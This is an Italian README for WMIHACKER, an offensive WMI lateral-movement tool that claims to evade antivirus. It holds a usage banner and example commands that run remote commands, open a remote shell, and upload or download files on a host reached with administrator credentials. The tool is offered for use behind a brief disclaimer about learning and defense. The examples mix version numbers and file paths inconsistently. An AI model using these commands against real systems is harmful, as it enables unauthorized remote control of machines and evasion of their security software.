
Strumento di esecuzione comandi per movimento laterale che bypassa il software antivirus
Dichiarazione di non responsabilità: la tecnologia coinvolta in questo progetto è solo a scopo di apprendimento e difesa della sicurezza; è vietato l'uso illegale!
Strumento di test per l'esecuzione di comandi di movimento laterale che bypassa gli antivirus(Non necessita della porta 445)
Introduzione: I comuni strumenti WMIEXEC e PSEXEC eseguono comandi creando un servizio o chiamando Win32_Process.create; questi metodi sono stati intercettati al 100% dagli antivirus. Per questo abbiamo creato WMIHACKER (strumento di test per l'esecuzione di comandi di movimento laterale che bypassa gli antivirus, non necessita della porta 445).
Funzioni principali: 1. Esecuzione di comandi; 2. Caricamento file; 3. Download file
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode
host hostname or IP address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
Il risultato viene visualizzato dopo l'esecuzione del comando
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
Nessun risultato viene visualizzato dopo l'esecuzione del comando
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
Modalità shell
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
Caricamento file: copia calc.exe locale sull'host remoto come c:\calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
Download file: scarica calc.exe dall'host remoto sulla macchina locale come c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
WMIHACKER si è unito a 404Starlink